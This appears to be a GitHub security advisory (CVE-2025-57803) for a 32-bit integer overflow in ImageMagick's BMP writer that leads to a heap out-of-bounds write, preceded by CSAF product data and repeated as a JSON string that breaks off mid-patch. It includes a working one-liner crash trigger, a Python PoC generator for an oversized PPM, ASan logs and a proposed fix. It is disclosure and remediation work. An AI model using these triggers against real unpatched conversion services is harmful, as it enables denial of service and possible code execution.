"product_identification_helper": {
"cpe": "cpe:/a:imagemagick:imagemagick:6.9.13-28"
}
}
}
],
"category": "product_name",
"name": "ImageMagick"
}
],
"category": "vendor",
"name": "Open Source"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux",
"product": {
"name": "SUSE Linux",
"product_id": "T002207",
"product_identification_helper": {
"cpe": "cpe:/o:suse:suse_linux:-"
}
}
},
{
"category": "product_name",
"name": "SUSE openSUSE",
"product": {
"name": "SUSE openSUSE",
"product_id": "T027843",
"product_identification_helper": {
"cpe": "cpe:/o:suse:opensuse:-"
}
}
}
],
"category": "vendor",
"name": "SUSE"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-55212",
"product_status": {
"known_affected": [
"T002207",
"T027843",
"T046499",
"T046498"
]
},
"release_date": "2025-08-25T22:00:00.000+00:00",
"title": "CVE-2025-55212"
},
{
"cve": "CVE-2025-55298",
"product_status": {
"known_affected": [
"T002207",
"T027843",
"T046499",
"T046498"
]
},
"release_date": "2025-08-25T22:00:00.000+00:00",
"title": "CVE-2025-55298"
},
{
"cve": "CVE-2025-57803",
"product_status": {
"known_affected": [
"T002207",
"T027843",
"T046499",
"T046498"
]
},
"release_date": "2025-08-25T22:00:00.000+00:00",
"title": "CVE-2025-57803"
}
]
}
ghsa-mxvv-97wh-cfmm
Vulnerability from github
Summary
A 32-bit integer overflow in the BMP encoder’s scanline-stride computation collapses bytes_per_line (stride) to a tiny value while the per-row writer still emits 3 × width bytes for 24-bpp images. The row base pointer advances using the (overflowed) stride, so the first row immediately writes past its slot and into adjacent heap memory with attacker-controlled bytes. This is a classic, powerful primitive for heap corruption in common auto-convert pipelines.
-
Impact: Attacker-controlled heap out-of-bounds (OOB) write during conversion to BMP.
-
Surface: Typical upload → normalize/thumbnail →
magick ... out.bmpworkers. -
32-bit: Vulnerable (reproduced with ASan).
-
64-bit: Safe from this specific integer overflow (IOF) by arithmetic, but still add product/size guards.
-
Proposed severity: Critical 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
Scope & Affected Builds
-
Project: ImageMagick (BMP writer path,
WriteBMPImageincoders/bmp.c). -
Commit under test:
3fcd081c0278427fc0e8ac40ef75c0a1537792f7 -
Version string from the run:
ImageMagick 7.1.2-0 Q8 i686 9bde76f1d:20250712 -
Architecture: 32-bit i686 (
sizeof(size_t) == 4) with ASan/UBSan. -
Note on other versions: Any release/branch with the same stride arithmetic and row loop is likely affected on 32-bit.
Root Cause (with code anchors)
Stride computation (writer)
c
bytes_per_line = 4 * ((image->columns * bmp_info.bits_per_pixel + 31) / 32);
Per-row base and 24-bpp loop (writer)
c
q = pixels + ((ssize_t)image->rows - y - 1) * (ssize_t)bytes_per_line;
for (x = 0; x < (ssize_t)image->columns; x++) {
*q++ = B(...); *q++ = G(...); *q++ = R(...); // writes 3 * width bytes
}
Allocation (writer)
c
pixel_info = AcquireVirtualMemory(image->rows,
MagickMax(bytes_per_line, image->columns + 256UL) * sizeof(*pixels));
pixels = (unsigned char *) GetVirtualMemoryBlob(pixel_info);
Dimension “caps” (insufficient)
The writer rejects dimensions that don’t round-trip through signed int, but both overflow thresholds below are ≤ INT_MAX on 32-bit, so the caps do not prevent the bug.
Integer-Overflow Analysis (32-bit size_t)
Stride formula for 24-bpp:
bytes_per_line = 4 * ((width * 24 + 31) / 32)
There are two independent overflow hazards on 32-bit:
-
Stage-1 multiply+add in
(width * 24 + 31)
Overflow iffwidth > ⌊(0xFFFFFFFF − 31) / 24⌋ = 178,956,969
→ at width ≥ 178,956,970 the numerator wraps small before/32, producing a tinybytes_per_line. -
Stage-2 final ×4 after the division
Letq = (width * 24 + 31) / 32. Final×4overflows iffq > 0x3FFFFFFF.
Solving gives width ≥ 1,431,655,765 (0x55555555).
Both thresholds are below INT_MAX (≈2.147e9), so “int caps” don’t help.
Mismatch predicate (guaranteed OOB when overflowed):
Per-row write for 24-bpp is row_bytes = 3*width. Safety requires row_bytes ≤ bytes_per_line.
Under either overflow, bytes_per_line collapses → 3*width > bytes_per_line holds → OOB-write.
Concrete Demonstration
Chosen width: W = 178,957,200 (just over Stage-1 bound)
-
Stage-1:
24*W + 31 = 4,294,972,831 ≡ 0x0000159F (mod 2^32)→ 5535 -
Divide by 32:
5535 / 32 = 172 -
Multiply by 4:
bytes_per_line = 172 * 4 = **688** bytes← tiny stride -
Per-row data (24-bpp):
row_bytes = 3*W = **536,871,600** bytes -
Allocation used:
MagickMax(688, W+256) = **178,957,456** bytes -
Immediate OOB: first row writes ~536MB into a 178MB region, starting at a base advanced by only 688 bytes.
Observed Result (ASan excerpt)
ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6eaac490
WRITE of size 1 in WriteBMPImage coders/bmp.c:2309
...
allocated by:
AcquireVirtualMemory MagickCore/memory.c:747
WriteBMPImage coders/bmp.c:2092
-
Binary: ELF 32-bit i386, Q8, non-HDRI
-
Resources set to permit execution of the writer path (defense-in-depth limits relaxed for repro)
Exploitability & Risk
-
Primitive: Large, contiguous, attacker-controlled heap overwrite beginning at the scanline slot.
-
Control: Overwrite bytes are sourced from attacker-supplied pixels (e.g., crafted input image to be converted to BMP).
-
Likely deployment: Server-side, non-interactive conversion pipelines (UI:N).
-
Outcome: At minimum, deterministic crash (DoS). On many 32-bit allocators, well-understood heap shaping can escalate to RCE.
Note on 64-bit: Without integer overflow, bytes_per_line = 4 * ceil((3*width)/4) ≥ 3*width, so the mismatch doesn’t arise. Still add product/size checks to prevent DoS and future refactors.
Reproduction (copy-paste triager script)
Test Environment:
-
docker run -it --rm --platform linux/386 debian:11 bash -
Install deps:
apt-get update && apt-get install -y build-essential git autoconf automake libtool pkg-config python3 -
Clone & checkout: ImageMagick
7.1.2-0→ commit3fcd081c0278427f... -
Configure 32-bit Q8 non-HDRI with ASan/UBSan (summary):
```bash ./configure \ --host=i686-pc-linux-gnu \ --build=x86_64-pc-linux-gnu \ --disable-dependency-tracking \ --disable-silent-rules \ --disable-shared \ --disable-openmp \ --disable-docs \ --without-x \ --without-perl \ --without-magick-plus-plus \ --without-lqr \ --without-zstd \ --without-tiff \ --with-quantum-depth=8 \ --disable-hdri \ CFLAGS="-O1 -g -fno-omit-frame-pointer -fsanitize=address,undefined" \ CXXFLAGS="-O1 -g -fno-omit-frame-pointer -fsanitize=address,undefined" \ LDFLAGS="-fsanitize=address,undefined"
make -j"$(nproc)" ``` - Runtime limits to exercise writer:
bash
export MAGICK_WIDTH_LIMIT=200000000
export MAGICK_HEIGHT_LIMIT=200000000
export MAGICK_TEMPORARY_PATH=/tmp
export TMPDIR=/tmp
export ASAN_OPTIONS="detect_leaks=0:malloc_context_size=20:alloc_dealloc_mismatch=0"
One-liner trigger (no input file):
bash
W=178957200
./utilities/magick \
-limit width 200000000 -limit height 200000000 \
-limit memory 268435456 -limit map 0 -limit disk 200000000000 \
-limit thread 1 \
-size ${W}x1 xc:black -type TrueColor -define bmp:format=bmp3 BMP3:/dev/null
Expected: ASan heap-buffer-overflow in WriteBMPImage (will be provided in a private gist link).
Alternate PoC (raw PPM generator):
```python
!/usr/bin/env python3
W, H, MAXV = 180_000_000, 1, 255
W > 178,956,969
with open("huge.ppm", "wb") as f: f.write(f"P6\n{W} {H}\n{MAXV}\n".encode("ascii")) chunk = (b"\x41\x42\x43") * (1024*1024) remaining = 3 * W while remaining: n = min(remaining, len(chunk)) f.write(chunk[:n]); remaining -= n
Then: magick huge.ppm out.bmp
```
Proposed Severity
-
Primary vector (server auto-convert):
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H→ 9.8 Critical -
If strictly CLI/manual conversion:
UI:R→ 8.8 High
Maintainer Pushbacks — Pre-empted
-
“MagickMax makes allocation large.” The row base advances by overflowed
bytes_per_line, causing row overlap and eventual region exit regardless of total allocation size. -
“We’re 64-bit only.” Code is still incorrect for 32-bit consumers/cross-compiles; also add product guards on 64-bit for correctness/DoS.
-
“Resource policy blocks large images.” That’s environment-dependent defense-in-depth; arithmetic must be correct.
Remediation (Summary)
Add checked arithmetic around stride computation and enforce a per-row invariant so that the number of bytes emitted per row (row_bytes) always fits within the computed stride (bytes_per_line). Guard multiplication/addition and product computations used for header fields and allocation sizes, and fail early with a clear WidthOrHeightExceedsLimit/ResourceLimitError when values exceed safe bounds.
Concretely:
- Validate width and bits_per_pixel before the stride formula to ensure (width*bpp + 31) cannot overflow a size_t.
- Compute row_bytes for the chosen bpp and assert row_bytes <= bytes_per_line.
- Bound rows * stride before allocating and ensure biSizeImage (DIB 32-bit) cannot overflow.
A full suggested guarded implementation is provided in Appendix A — Full patch (for maintainers).
Regression Tests to Include (PR-friendly)
-
32-bit overflow repros (with ASan):
-
rows=1,width ≥ 178,956,970,bpp=24→ now cleanly errors. -
rows=2, same bound → no row overlap; clean error.
-
-
64-bit sanity: Medium images (e.g.,
8192×4096, 24-bpp) round-trip; header’sbiSizeImage = rows * bytes_per_line. -
Packed bpp (1/4/8): Validate
row_bytes = (width*bpp+7)/8(guarded), 4-pad, and payload ≤ stride holds.
Attachments (private BMP_Package)
Provided with report: README.md, poc_ppm_generator.py, repro_commands.sh, full_asan_bmp_crash.txt, appendix_a_patch_block.c. (Private gist link with package provided separately.)
Disclosure & Coordination
-
Reporter: Lumina Mescuwa
-
Tested on: i686 Linux container (details in Repro)
-
Timeline: August 19th, 2025
Appendices
Appendix A — Patch block tailored to bmp.c
Where this hooks in (current code):
-
Stride is computed here:
bytes_per_line=4*((image->columns*bmp_info.bits_per_pixel+31)/32); -
Header uses
bmp_info.image_size=(unsigned int) (bytes_per_line*image->rows); -
Allocation uses
AcquireVirtualMemory(image->rows, MagickMax(bytes_per_line, image->columns+256UL)*sizeof(*pixels)); -
24-bpp row loop writes pixels then zero-pads up to
bytes_per_line(so the per-row slot size matters):for (x=3L*(ssize_t)image->columns; x < (ssize_t)bytes_per_line; x++) *q++=0x00;
Suggested Patch (minimal surface, guards + invariant)
I recommend this in place of the existing bytes_per_line assignment and the subsequent bmp_info.image_size / allocation block. Keep your macros and local variables as-is.
```c / --- PATCH BEGIN: guarded stride, per-row invariant, and product checks --- /
/ 1) Guard the original stride arithmetic (preserve behavior, add checks). / if (bmp_info.bits_per_pixel == 0 || (size_t)image->columns > (SIZE_MAX - 31) / (size_t)bmp_info.bits_per_pixel) ThrowWriterException(ImageError, "WidthOrHeightExceedsLimit");
size_t _tmp = (size_t)image->columns * (size_t)bmp_info.bits_per_pixel + 31; / Divide first; then check the final ×4 won't overflow. / _tmp /= 32; if (_tmp > (SIZE_MAX / 4)) ThrowWriterException(ImageError, "WidthOrHeightExceedsLimit");
bytes_per_line = 4 * _tmp; / same formula as before, now checked /
/ 2) Compute the actual data bytes written per row for the chosen bpp. / size_t row_bytes; if (bmp_info.bits_per_pixel == 1 || bmp_info.bits_per_pixel == 4 || bmp_info.bits_per_pixel == 8) { / packed: ceil(widthbpp/8) / if ((size_t)image->columns > (SIZE_MAX - 7) / (size_t)bmp_info.bits_per_pixel) ThrowWriterException(ImageError, "WidthOrHeightExceedsLimit"); row_bytes = (((size_t)image->columns * (size_t)bmp_info.bits_per_pixel) + 7) >> 3; } else { / 16/24/32 bpp: (bpp/8) * width */ size_t bpp_bytes = (size_t)bmp_info.bits_per_pixel / 8; if (bpp_bytes == 0 || (size_t)image->columns > SIZE_MAX / bpp_bytes) ThrowWriterException(ImageError, "WidthOrHeightExceedsLimit"); row_bytes = bpp_bytes * (size_t)image->columns; }
/ 3) Per-row safety invariant: the payload must fit the stride. / if (row_bytes > bytes_per_line) ThrowWriterException(ResourceLimitError, "MemoryAllocationFailed");
/ 4) Guard header size and allocation products. / if ((size_t)image->rows == 0) ThrowWriterException(ImageError, "WidthOrHeightExceedsLimit");
/ biSizeImage = rows * bytes_per_line (DIB field is 32-bit) / if (bytes_per_line > 0xFFFFFFFFu / (size_t)image->rows) ThrowWriterException(ImageError, "WidthOrHeightExceedsLimit"); bmp_info.image_size = (unsigned int)(bytes_per_line * (size_t)image->rows);
/ Allocation count = rows * stride_used, with existing MagickMax policy. / size_t _stride = MagickMax(bytes_per_line, (size_t)image->columns + 256UL); if (_stride > SIZE_MAX / (size_t)image->rows) ThrowWriterException(ResourceLimitError, "MemoryAllocationFailed");
pixel_info = AcquireVirtualMemory((size_t)image->rows, _stride * sizeof(pixels)); if (pixel_info == (MemoryInfo ) NULL) ThrowWriterException(ResourceLimitError, "MemoryAllocationFailed"); pixels = (unsigned char *) GetVirtualMemoryBlob(pixel_info);
/ Optional: keep zeroing aligned to computed header size. / (void) memset(pixels, 0, (size_t) bmp_info.image_size);
/ --- PATCH END --- / ```
Why this is the right spot?
-
It replaces the unguarded stride line you currently have, without changing the algorithm (still
4*((W*bpp+31)/32)). -
It fixes the header (
biSizeImage) to be a checked product, instead of a potentially wrapped multiplication. -
It guards allocation where you presently allocate
rows × MagickMax(bytes_per_line, columns+256). -
The invariant
row_bytes ≤ bytes_per_lineensures your 24-bpp emission loop (writes 3 bytes/pixel, then pads tobytes_per_line) can never exceed the per-row slot the code relies on.
Notes
-
Behavior preserved: The stride value for normal images is unchanged; only pathological integer states are rejected.
-
Header consistency:
biSizeImage = rows * bytes_per_lineremains true by construction, but now cannot overflow a 32-bit DIB field. -
Defensive alignment: If you prefer, you can compute
bytes_per_lineas((row_bytes + 3) & ~3U); it’s equivalent and may read clearer, but I kept the original formula with guards to minimize diff.
A slightly larger “helpers” variant (with safe_mul_size / safe_add_size utilities) also comes to mind, but the block above is the tightest patch that closes the 32-bit IOF→OOB class without touching unrelated code paths.
Appendix B — Arithmetic Worked Example (W=178,957,200)
-
(24W + 31) mod 2^32 = 5535 -
bytes_per_line = 4 * (5535/32) = 688 -
row_bytes (24-bpp) = 536,871,600 -
Allocation via
MagickMax = 178,957,456→ immediate row 0 out-of-bounds.
Appendix C — Raw ASan Log (trimmed)
```
==49178==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6eaac490 WRITE of size 1 at 0x6eaac490 thread T0 #0 0xed2788 in WriteBMPImage coders/bmp.c:2309 #1 0x13da32c in WriteImage MagickCore/constitute.c:1342 #2 0x13dc657 in WriteImages MagickCore/constitute.c:1564 0x6eaac490 is located 0 bytes to the right of 178957456-byte region allocated by thread T0 here: #0 0x408e30ab in __interceptor_posix_memalign #1 0xd03305 in AcquireVirtualMemory MagickCore/memory.c:747 #2 0xecd597 in WriteBMPImage coders/bmp.c:2092 ```
{
"affected": [
{
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q16-AnyCPU"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "14.8.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q16-HDRI-AnyCPU"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "14.8.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q16-HDRI-x86"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "14.8.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q16-x86"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "14.8.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q8-AnyCPU"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "14.8.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q8-x86"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "14.8.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-57803"
],
"database_specific": {
"cwe_ids": [
"CWE-122",
"CWE-190"
],
"github_reviewed": true,
"github_reviewed_at": "2025-08-26T16:07:27Z",
"nvd_published_at": "2025-08-26T18:15:47Z",
"severity": "HIGH"
},
"details": "## Summary\n\nA 32-bit integer overflow in the BMP encoder\u2019s scanline-stride computation collapses\u00a0`bytes_per_line`\u00a0(stride) to a tiny value while the per-row writer still emits\u00a0`3 \u00d7 width`\u00a0bytes for 24-bpp images. The row base pointer advances using the (overflowed) stride, so the first row immediately writes past its slot and into adjacent heap memory with attacker-controlled bytes. This is a classic, powerful primitive for heap corruption in common auto-convert pipelines.\n\n- **Impact:**\u00a0Attacker-controlled heap out-of-bounds (OOB) write during conversion\u00a0**to BMP**.\n \n- **Surface:**\u00a0Typical upload \u2192 normalize/thumbnail \u2192\u00a0`magick ... out.bmp`\u00a0workers.\n \n- **32-bit:**\u00a0**Vulnerable**\u00a0(reproduced with ASan).\n \n- **64-bit:**\u00a0Safe from this specific integer overflow (IOF) by arithmetic, but still add product/size guards.\n \n- **Proposed severity:**\u00a0**Critical 9.8**\u00a0(CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).\n \n\n---\n\n## Scope \u0026 Affected Builds\n\n- **Project:**\u00a0ImageMagick (BMP writer path,\u00a0`WriteBMPImage`\u00a0in\u00a0`coders/bmp.c`).\n \n- **Commit under test:**\u00a0`3fcd081c0278427fc0e8ac40ef75c0a1537792f7`\n \n- **Version string from the run:**\u00a0`ImageMagick 7.1.2-0 Q8 i686 9bde76f1d:20250712`\n \n- **Architecture:**\u00a032-bit i686 (**`sizeof(size_t) == 4`**) with ASan/UBSan.\n \n- **Note on other versions:**\u00a0Any release/branch with the same stride arithmetic and row loop is likely affected on 32-bit.\n \n\n---\n\n## Root Cause (with code anchors)\n\n### Stride computation (writer)\n\n```c\nbytes_per_line = 4 * ((image-\u003ecolumns * bmp_info.bits_per_pixel + 31) / 32);\n```\n\n### Per-row base and 24-bpp loop (writer)\n\n```c\nq = pixels + ((ssize_t)image-\u003erows - y - 1) * (ssize_t)bytes_per_line;\nfor (x = 0; x \u003c (ssize_t)image-\u003ecolumns; x++) {\n *q++ = B(...); *q++ = G(...); *q++ = R(...); // writes 3 * width bytes\n}\n```\n\n### Allocation (writer)\n\n```c\npixel_info = AcquireVirtualMemory(image-\u003erows,\n MagickMax(bytes_per_line, image-\u003ecolumns + 256UL) * sizeof(*pixels));\npixels = (unsigned char *) GetVirtualMemoryBlob(pixel_info);\n```\n\n### Dimension \u201ccaps\u201d (insufficient)\n\nThe writer rejects dimensions that don\u2019t round-trip through\u00a0`signed int`, but both overflow thresholds below are\u00a0**\u2264 INT_MAX**\u00a0on 32-bit, so the caps\u00a0**do not prevent**\u00a0the bug.\n\n---\n\n## Integer-Overflow Analysis (32-bit\u00a0`size_t`)\n\nStride formula for 24-bpp:\n\n```\nbytes_per_line = 4 * ((width * 24 + 31) / 32)\n```\n\nThere are\u00a0**two independent overflow hazards**\u00a0on 32-bit:\n\n1. **Stage-1 multiply+add**\u00a0in\u00a0`(width * 24 + 31)` \n Overflow iff\u00a0`width \u003e \u230a(0xFFFFFFFF \u2212 31) / 24\u230b = 178,956,969` \n \u2192 at\u00a0**width \u2265 178,956,970**\u00a0the numerator wraps small before\u00a0`/32`, producing a\u00a0**tiny**\u00a0`bytes_per_line`.\n \n2. **Stage-2 final \u00d74**\u00a0after the division \n Let\u00a0`q = (width * 24 + 31) / 32`. Final\u00a0`\u00d74`\u00a0overflows iff\u00a0`q \u003e 0x3FFFFFFF`. \n Solving gives\u00a0**width \u2265 1,431,655,765 (0x55555555)**.\n \n\nBoth thresholds are\u00a0**below**\u00a0`INT_MAX`\u00a0(\u22482.147e9), so \u201cint caps\u201d don\u2019t help.\n\n**Mismatch predicate (guaranteed OOB when overflowed):** \nPer-row write for 24-bpp is\u00a0`row_bytes = 3*width`. Safety requires\u00a0`row_bytes \u2264 bytes_per_line`. \nUnder either overflow,\u00a0`bytes_per_line`\u00a0collapses \u2192\u00a0`3*width \u003e bytes_per_line`\u00a0holds \u2192\u00a0**OOB-write**.\n\n---\n\n## Concrete Demonstration\n\nChosen width:\u00a0**`W = 178,957,200`**\u00a0(just over Stage-1 bound)\n\n- Stage-1:\u00a0`24*W + 31 = 4,294,972,831 \u2261 0x0000159F (mod 2^32)`\u00a0\u2192\u00a0**5535**\n \n- Divide by 32:\u00a0`5535 / 32 = 172`\n \n- Multiply by 4:\u00a0`bytes_per_line = 172 * 4 = **688** bytes`\u00a0\u2190 tiny stride\n \n- Per-row data (24-bpp):\u00a0`row_bytes = 3*W = **536,871,600** bytes`\n \n- Allocation used:\u00a0`MagickMax(688, W+256) = **178,957,456** bytes`\n \n- **Immediate OOB**: first row writes ~536MB into a 178MB region, starting at a base advanced by only 688 bytes.\n \n---\n\n## Observed Result (ASan excerpt)\n\n```\nERROR: AddressSanitizer: heap-buffer-overflow on address 0x6eaac490\nWRITE of size 1 in WriteBMPImage coders/bmp.c:2309\n...\nallocated by:\n AcquireVirtualMemory MagickCore/memory.c:747\n WriteBMPImage coders/bmp.c:2092\n```\n\n- Binary:\u00a0**ELF 32-bit i386**, Q8, non-HDRI\n \n- Resources set to permit execution of the writer path (defense-in-depth limits relaxed for repro)\n \n\n---\n\n## Exploitability \u0026 Risk\n\n- **Primitive:**\u00a0Large, contiguous, attacker-controlled heap overwrite beginning at the scanline slot.\n \n- **Control:**\u00a0Overwrite bytes are sourced from attacker-supplied pixels (e.g., crafted input image to be converted to BMP).\n \n- **Likely deployment:**\u00a0Server-side, non-interactive conversion pipelines (UI:N).\n \n- **Outcome:**\u00a0At minimum, deterministic crash (DoS). On many 32-bit allocators, well-understood heap shaping can escalate to\u00a0**RCE**.\n \n\n**Note on 64-bit:**\u00a0Without integer overflow,\u00a0`bytes_per_line = 4 * ceil((3*width)/4) \u2265 3*width`, so the mismatch doesn\u2019t arise. Still add product/size checks to prevent DoS and future refactors.\n\n---\n\n## Reproduction (copy-paste triager script)\n\n**Test Environment:**\n\n- `docker run -it --rm --platform linux/386 debian:11 bash`\n \n- Install deps:\u00a0`apt-get update \u0026\u0026 apt-get install -y build-essential git autoconf automake libtool pkg-config python3`\n \n- Clone \u0026 checkout: ImageMagick\u00a0`7.1.2-0`\u00a0\u2192 commit\u00a0`3fcd081c0278427f...`\n \n- Configure 32-bit Q8 non-HDRI with ASan/UBSan (summary):\n\n```bash\n./configure \\\n --host=i686-pc-linux-gnu \\\n --build=x86_64-pc-linux-gnu \\\n --disable-dependency-tracking \\\n --disable-silent-rules \\\n --disable-shared \\\n --disable-openmp \\\n --disable-docs \\\n --without-x \\\n --without-perl \\\n --without-magick-plus-plus \\\n --without-lqr \\\n --without-zstd \\\n --without-tiff \\\n --with-quantum-depth=8 \\\n --disable-hdri \\\n CFLAGS=\"-O1 -g -fno-omit-frame-pointer -fsanitize=address,undefined\" \\\n CXXFLAGS=\"-O1 -g -fno-omit-frame-pointer -fsanitize=address,undefined\" \\\n LDFLAGS=\"-fsanitize=address,undefined\"\n\nmake -j\"$(nproc)\"\n```\n- Runtime limits to exercise writer:\n\n```bash\nexport MAGICK_WIDTH_LIMIT=200000000\nexport MAGICK_HEIGHT_LIMIT=200000000\nexport MAGICK_TEMPORARY_PATH=/tmp\nexport TMPDIR=/tmp\nexport ASAN_OPTIONS=\"detect_leaks=0:malloc_context_size=20:alloc_dealloc_mismatch=0\"\n```\n\n**One-liner trigger (no input file):**\n\n```bash\nW=178957200\n./utilities/magick \\\n -limit width 200000000 -limit height 200000000 \\\n -limit memory 268435456 -limit map 0 -limit disk 200000000000 \\\n -limit thread 1 \\\n -size ${W}x1 xc:black -type TrueColor -define bmp:format=bmp3 BMP3:/dev/null\n```\n\n**Expected:**\u00a0ASan heap-buffer-overflow in\u00a0`WriteBMPImage` (will be provided in a private gist link).\n\n**Alternate PoC (raw PPM generator):**\n\n```python\n#!/usr/bin/env python3\nW, H, MAXV = 180_000_000, 1, 255 \n# W \u003e 178,956,969\nwith open(\"huge.ppm\", \"wb\") as f:\n f.write(f\"P6\\n{W} {H}\\n{MAXV}\\n\".encode(\"ascii\"))\n chunk = (b\"\\x41\\x42\\x43\") * (1024*1024)\n remaining = 3 * W\n while remaining:\n n = min(remaining, len(chunk))\n f.write(chunk[:n]); remaining -= n\n# Then: magick huge.ppm out.bmp\n```\n\n---\n\n## Proposed Severity\n\n- **Primary vector (server auto-convert):**\u00a0`AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`\u00a0\u2192\u00a0**9.8 Critical**\n \n- **If strictly CLI/manual conversion:**\u00a0`UI:R`\u00a0\u2192\u00a0**8.8 High**\n \n\n---\n\n## Maintainer Pushbacks \u2014 Pre-empted\n\n- **\u201cMagickMax makes allocation large.\u201d**\u00a0The row\u00a0**base**\u00a0advances by\u00a0**overflowed\u00a0`bytes_per_line`**, causing row overlap and eventual region exit regardless of total allocation size.\n \n- **\u201cWe\u2019re 64-bit only.\u201d**\u00a0Code is still incorrect for 32-bit consumers/cross-compiles; also add product guards on 64-bit for correctness/DoS.\n \n- **\u201cResource policy blocks large images.\u201d**\u00a0That\u2019s environment-dependent defense-in-depth; arithmetic must be correct.\n \n---\n\n## Remediation (Summary)\n\nAdd checked arithmetic around stride computation and enforce a per-row invariant so that the number of bytes emitted per row (row_bytes) always fits within the computed stride (bytes_per_line). Guard multiplication/addition and product computations used for header fields and allocation sizes, and fail early with a clear WidthOrHeightExceedsLimit/ResourceLimitError when values exceed safe bounds.\n\nConcretely:\n\n- Validate width and bits_per_pixel before the stride formula to ensure (width*bpp + 31) cannot overflow a size_t.\n- Compute row_bytes for the chosen bpp and assert row_bytes \u003c= bytes_per_line.\n- Bound rows * stride before allocating and ensure biSizeImage (DIB 32-bit) cannot overflow.\n\nA full suggested guarded implementation is provided in Appendix A \u2014 Full patch (for maintainers).\n\n---\n\n## Regression Tests to Include (PR-friendly)\n\n1. **32-bit overflow repros**\u00a0(with ASan):\n \n - `rows=1`,\u00a0`width \u2265 178,956,970`,\u00a0`bpp=24`\u00a0\u2192 now cleanly errors.\n \n - `rows=2`, same bound \u2192 no row overlap; clean error.\n \n2. **64-bit sanity:**\u00a0Medium images (e.g.,\u00a0`8192\u00d74096`, 24-bpp) round-trip; header\u2019s\u00a0`biSizeImage = rows * bytes_per_line`.\n \n3. **Packed bpp (1/4/8):**\u00a0Validate\u00a0`row_bytes = (width*bpp+7)/8`\u00a0(guarded), 4-pad, and\u00a0**payload \u2264 stride**\u00a0holds.\n\n---\n\n## Attachments (private BMP_Package) \nProvided with report: README.md, poc_ppm_generator.py, repro_commands.sh, full_asan_bmp_crash.txt, appendix_a_patch_block.c. (Private gist link with package provided separately.)\n\n---\n\n## Disclosure \u0026 Coordination\n\n- **Reporter:**\u00a0Lumina Mescuwa\n \n- **Tested on:**\u00a0i686 Linux container (details in Repro)\n \n- **Timeline:**\u00a0August 19th, 2025\n \n\n---\n\n## Appendices\n\n### Appendix A \u2014 Patch block tailored to\u00a0 `bmp.c`\n\n**Where this hooks in (current code):**\n\n- Stride is computed here:\u00a0`bytes_per_line=4*((image-\u003ecolumns*bmp_info.bits_per_pixel+31)/32);`\n \n- Header uses\u00a0`bmp_info.image_size=(unsigned int) (bytes_per_line*image-\u003erows);`\n \n- Allocation uses\u00a0`AcquireVirtualMemory(image-\u003erows, MagickMax(bytes_per_line, image-\u003ecolumns+256UL)*sizeof(*pixels));`\n \n- 24-bpp row loop writes pixels then zero-pads up to\u00a0`bytes_per_line`\u00a0(so the per-row slot size matters):\u00a0`for (x=3L*(ssize_t)image-\u003ecolumns; x \u003c (ssize_t)bytes_per_line; x++) *q++=0x00;`\n \n\n---\n\n## Suggested Patch (minimal surface, guards + invariant)\n\nI recommend this\u00a0**in place of**\u00a0the existing\u00a0`bytes_per_line`\u00a0assignment and the subsequent\u00a0`bmp_info.image_size`\u00a0/ allocation block. Keep your macros and local variables as-is.\n\n```c\n/* --- PATCH BEGIN: guarded stride, per-row invariant, and product checks --- */\n\n/* 1) Guard the original stride arithmetic (preserve behavior, add checks). */\nif (bmp_info.bits_per_pixel == 0 ||\n (size_t)image-\u003ecolumns \u003e (SIZE_MAX - 31) / (size_t)bmp_info.bits_per_pixel)\n ThrowWriterException(ImageError, \"WidthOrHeightExceedsLimit\");\n\nsize_t _tmp = (size_t)image-\u003ecolumns * (size_t)bmp_info.bits_per_pixel + 31;\n/* Divide first; then check the final \u00d74 won\u0027t overflow. */\n_tmp /= 32;\nif (_tmp \u003e (SIZE_MAX / 4))\n ThrowWriterException(ImageError, \"WidthOrHeightExceedsLimit\");\n\nbytes_per_line = 4 * _tmp; /* same formula as before, now checked */\n\n/* 2) Compute the actual data bytes written per row for the chosen bpp. */\nsize_t row_bytes;\nif (bmp_info.bits_per_pixel == 1 || bmp_info.bits_per_pixel == 4 || bmp_info.bits_per_pixel == 8) {\n /* packed: ceil(width*bpp/8) */\n if ((size_t)image-\u003ecolumns \u003e (SIZE_MAX - 7) / (size_t)bmp_info.bits_per_pixel)\n ThrowWriterException(ImageError, \"WidthOrHeightExceedsLimit\");\n row_bytes = (((size_t)image-\u003ecolumns * (size_t)bmp_info.bits_per_pixel) + 7) \u003e\u003e 3;\n} else {\n /* 16/24/32 bpp: (bpp/8) * width */\n size_t bpp_bytes = (size_t)bmp_info.bits_per_pixel / 8;\n if (bpp_bytes == 0 || (size_t)image-\u003ecolumns \u003e SIZE_MAX / bpp_bytes)\n ThrowWriterException(ImageError, \"WidthOrHeightExceedsLimit\");\n row_bytes = bpp_bytes * (size_t)image-\u003ecolumns;\n}\n\n/* 3) Per-row safety invariant: the payload must fit the stride. */\nif (row_bytes \u003e bytes_per_line)\n ThrowWriterException(ResourceLimitError, \"MemoryAllocationFailed\");\n\n/* 4) Guard header size and allocation products. */\nif 